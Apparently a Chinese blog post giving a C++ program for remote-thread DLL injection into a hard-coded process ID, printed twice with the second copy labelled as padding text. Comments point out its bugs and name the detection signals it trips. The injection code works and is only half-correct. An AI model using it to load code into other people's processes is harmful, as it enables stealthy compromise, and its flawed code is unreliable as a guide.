c++ dll注入

Author:linshao

#include 
#include 

int main() {
	// Remote-thread DLL injection demo: OpenProcess -> VirtualAllocEx ->
	// WriteProcessMemory -> CreateRemoteThread(LoadLibraryA, <path>).
	// Every step prints a status string but execution never stops on
	// failure, and main() always returns 0, so the exit code carries no
	// information about success.
	// Defender note: this exact API chain is the textbook injection
	// pattern; CreateRemoteThread into another process is logged by
	// Sysmon Event ID 8, and an RWX allocation in a foreign process is a
	// widely used alert trigger.

	// Original note (translated): the macros cannot be used on x64, so
	// the plain A-suffixed function is called directly; Kernel32.dll is
	// loaded because the memory APIs below live there. The returned
	// module handle `a` is not used after this check.
	HMODULE a=LoadLibraryA("C:\\windows\\system32\\Kernel32.dll");
	if (a) {}
	else { printf("导入模块失败"); }	// "module load failed" - continues regardless
	// Obtain a handle to the target process.
	// 2097151 == 0x1FFFFF, the full access mask (PROCESS_ALL_ACCESS on
	// current Windows); 16208 is a hard-coded PID valid only for one
	// specific run. On failure h is NULL and is still passed to every
	// call below.
	HANDLE h = OpenProcess(2097151, true, 16208);
	if (h) { printf("打开句柄成功\n"); }	// "handle opened"
	else { printf("打开句柄失败"); }	// "failed to open handle"

	// Path of the DLL to load in the target; the next step copies this
	// string into the target's address space. Original note: the DLL
	// must match the target's bitness (x86 vs x64).
	const char* s = "F:\\TEMP\\64.dll";
	printf(s);	// non-literal format string (should be printf("%s", s)); no newline either

	// Reserve+commit a buffer in the target for the path string.
	// Size is strlen(s), i.e. the string without its terminating NUL.
	// PAGE_EXECUTE_READWRITE is requested although the buffer only ever
	// holds a path; an RWX remote allocation is a common detection signal.
	LPVOID pbuf=VirtualAllocEx(h, 0, strlen(s), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);	
	if (!pbuf) {printf("申请内存失败\n");}else {printf("申请内存成功\n");}	// "alloc failed" / "alloc ok"

	// Copy strlen(s) bytes of the path into the remote buffer; the
	// bytes-written out-parameter is not requested (0).
	BOOL aaa=WriteProcessMemory(h,pbuf,s, strlen(s),0);		
	if (aaa){printf("写入成功\n");}else{printf("写入失败\n");}	// "write ok" / "write failed"

	// Start a thread in the target whose entry point is this process's
	// address of LoadLibraryA, with the remote path buffer as argument.
	// Presumably relies on kernel32 being mapped at the same base in both
	// processes - TODO confirm. The same call is issued three times below
	// (hand3, hand2, hand1), so three remote threads are created.
	HANDLE hand3=CreateRemoteThread(h,0, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pbuf,0,NULL);
	if (hand3!=NULL) {printf("注入成功\n");}else{printf("注入失败\n");}	// "injected" / "injection failed"

	// Second, identical remote thread.
	HANDLE hand2 = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pbuf, 0, NULL);
	if (hand2 != NULL) { printf("注入成功\n"); }
	else { printf("注入失败\n"); }

	// Third, identical remote thread (NULL instead of 0 for the security
	// attributes; same effect).
	HANDLE hand1 = CreateRemoteThread(h,NULL,0,(LPTHREAD_START_ROUTINE)LoadLibraryA,pbuf,0,NULL);
		// earlier variant kept by the author: LoadLibrary (macro) instead of LoadLibraryA
	if (hand1 != NULL) { 
		printf("注入成功\n"); 
		
	}
	else { printf("注入失败\n"); }
	// Waits on the *process* handle, not on any of the remote threads:
	// this blocks until the target process exits (-1 converts to
	// INFINITE). The three thread handles are never waited on or closed.
	WaitForSingleObject(h, -1);
	CloseHandle(h);
	
	return 0;
}

凑文字:

#include
#include

int main() {
    // Remote-thread DLL injection demo: OpenProcess -> VirtualAllocEx ->
    // WriteProcessMemory -> CreateRemoteThread(LoadLibraryA, <path>).
    // Every step prints a status string but execution never stops on
    // failure, and main() always returns 0, so the exit code carries no
    // information about success.
    // Defender note: this exact API chain is the textbook injection
    // pattern; CreateRemoteThread into another process is logged by
    // Sysmon Event ID 8, and an RWX allocation in a foreign process is a
    // widely used alert trigger.

    // Original note (translated): the macros cannot be used on x64, so
    // the plain A-suffixed function is called directly; Kernel32.dll is
    // loaded because the memory APIs below live there. The returned
    // module handle `a` is not used after this check.
    HMODULE a=LoadLibraryA("C:\\windows\\system32\\Kernel32.dll");
    if (a) {}
    else { printf("导入模块失败"); }    // "module load failed" - continues regardless
    // Obtain a handle to the target process.
    // 2097151 == 0x1FFFFF, the full access mask (PROCESS_ALL_ACCESS on
    // current Windows); 16208 is a hard-coded PID valid only for one
    // specific run. On failure h is NULL and is still passed to every
    // call below.
    HANDLE h = OpenProcess(2097151, true, 16208);
    if (h) { printf("打开句柄成功\n"); }    // "handle opened"
    else { printf("打开句柄失败"); }    // "failed to open handle"

    // Path of the DLL to load in the target; the next step copies this
    // string into the target's address space. Original note: the DLL
    // must match the target's bitness (x86 vs x64).
    const char* s = "F:\\TEMP\\64.dll";
    printf(s);    // non-literal format string (should be printf("%s", s)); no newline either

    // Reserve+commit a buffer in the target for the path string.
    // Size is strlen(s), i.e. the string without its terminating NUL.
    // PAGE_EXECUTE_READWRITE is requested although the buffer only ever
    // holds a path; an RWX remote allocation is a common detection signal.
    LPVOID pbuf=VirtualAllocEx(h, 0, strlen(s), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);    
    if (!pbuf) {printf("申请内存失败\n");}else {printf("申请内存成功\n");}    // "alloc failed" / "alloc ok"

    // Copy strlen(s) bytes of the path into the remote buffer; the
    // bytes-written out-parameter is not requested (0).
    BOOL aaa=WriteProcessMemory(h,pbuf,s, strlen(s),0);        
    if (aaa){printf("写入成功\n");}else{printf("写入失败\n");}    // "write ok" / "write failed"

    // Start a thread in the target whose entry point is this process's
    // address of LoadLibraryA, with the remote path buffer as argument.
    // Presumably relies on kernel32 being mapped at the same base in both
    // processes - TODO confirm. The same call is issued three times below
    // (hand3, hand2, hand1), so three remote threads are created.
    HANDLE hand3=CreateRemoteThread(h,0, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pbuf,0,NULL);
    if (hand3!=NULL) {printf("注入成功\n");}else{printf("注入失败\n");}    // "injected" / "injection failed"

    // Second, identical remote thread.
    HANDLE hand2 = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pbuf, 0, NULL);
    if (hand2 != NULL) { printf("注入成功\n"); }
    else { printf("注入失败\n"); }

    // Third, identical remote thread (NULL instead of 0 for the security
    // attributes; same effect).
    HANDLE hand1 = CreateRemoteThread(h,NULL,0,(LPTHREAD_START_ROUTINE)LoadLibraryA,pbuf,0,NULL);
        // earlier variant kept by the author: LoadLibrary (macro) instead of LoadLibraryA
    if (hand1 != NULL) { 
        printf("注入成功\n"); 
        
    }
    else { printf("注入失败\n"); }
    // Waits on the *process* handle, not on any of the remote threads:
    // this blocks until the target process exits (-1 converts to
    // INFINITE). The three thread handles are never waited on or closed.
    WaitForSingleObject(h, -1);
    CloseHandle(h);
    
    return 0;
}
